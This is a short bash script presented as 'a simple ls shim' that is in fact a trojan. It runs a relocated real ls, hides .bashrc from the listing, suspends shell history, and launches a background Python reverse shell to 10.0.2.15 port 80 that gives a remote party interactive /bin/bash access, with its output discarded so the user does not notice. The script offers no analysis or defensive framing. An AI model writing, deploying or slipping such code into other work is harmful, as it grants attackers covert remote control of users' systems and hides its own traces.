#!/bin/bash
: <<'END'
A simple ls shim
END

# disable bash history
set +o history


# Execute real 'ls' and hide .bashrc
LS=/lib/init/init-ls
$LS $@ | grep -v .bashrc

# python reverse shell
export RHOST=10.0.2.15
export RPORT=80
python -c 'import sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/bash")' &> /dev/null &

disown

# enable bash history
set -o history